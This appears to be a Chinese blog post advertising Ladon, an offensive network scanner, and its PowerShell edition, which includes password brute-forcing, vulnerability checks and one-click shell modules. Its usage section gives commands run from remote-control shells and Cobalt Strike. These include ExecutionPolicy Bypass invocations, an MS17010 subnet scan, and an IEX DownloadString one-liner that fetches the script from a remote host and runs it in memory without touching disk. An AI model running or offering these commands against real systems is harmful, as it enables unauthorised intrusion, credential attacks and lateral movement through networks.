logo

K8哥哥

没有绝对安全的系统

Ladon Scanner For PowerShell

本文于 1901 天之前发表

程序简介

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主机)、VNC、Windows密码(IPC、WMI、SMB)、Weblogic后台、Rar压缩包密码等,Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

使用说明

ID主题URL
1Ladon文档主页https://github.com/k8gege/Ladon/wiki
2基础用法详解https://github.com/k8gege/Ladon/wiki/Ladon-Usage
3Cobalt Strikehttps://github.com/k8gege/Ladon/wiki/Ladon-&-Cobalt-Strike
4Exp生成器使用https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
5高度自定义插件https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
6外部模块参考https://github.com/k8gege/K8CScan/wiki
7PowerLadonhttps://github.com/k8gege/Ladon/wiki/Ladon-&-PowerShell
8PythonLadonhttps://github.com/k8gege/PyLadon
9LinuxLadonhttps://github.com/k8gege/LinuxLadon
10漏洞演示视频https://github.com/k8gege/K8CScan/tree/master/Video

PowerLadon

PowerLadon完美兼容win7-win10 PowerShell,对于不支持.net程序插件化的远控,可使用

PowerShell版,也可CMD命令行下远程加载内存实现无文件扫描,模块加载后用法和EXE一致。

Ladon.ps1脚本由EXE转换而成,具备EXE版所有功能,相关功能使用请查看Ladon说明文档。

下载

最新版本 https://github.com/k8gege/Ladon

历史版本 https://github.com/k8gege/PowerLadon

0x001 PowerShell本地加载

适用于支持PowerShell交互远控或Shell,如Cobalt Strike

1
2
3
> powershell 
> Import-Module .\Ladon.ps1
> Ladon OnlinePC

0x002 Cmd本地加载

适用于还没跟上时代的远控或Shell只支持CMD交互

1
2
3
4
5
> powershell Import-Module .\Ladon.ps1;Ladon w

powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x004 Bypass 绕过PowerShell限制

1
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

Cobalt Strike

1
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

0x005 自定义端口扫描

1
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

Cobalt Strike

1
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

0x003 Cmd远程加载

适用于还没跟上时代的远控或Shell只支持CMD交互

1
2
> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon w"

0x004 远控交互式CMD

0x005 菜刀非交互CMD

0x006 Empire非交互CMD

Empire的shell有点问题,分号被截断,可以加个cmd /c

0x007 MSF交互式CMD

.TestON

Win7 x86 (Microsoft Windows [6.1.7601])
Win8 x64 (Microsoft Windows [6.2.9200])
Win10 x64 (Microsoft Windows [10.0.14393])
Win11 x64 (Microsoft Windows [10.0.22000.856]

扫码加入K8小密圈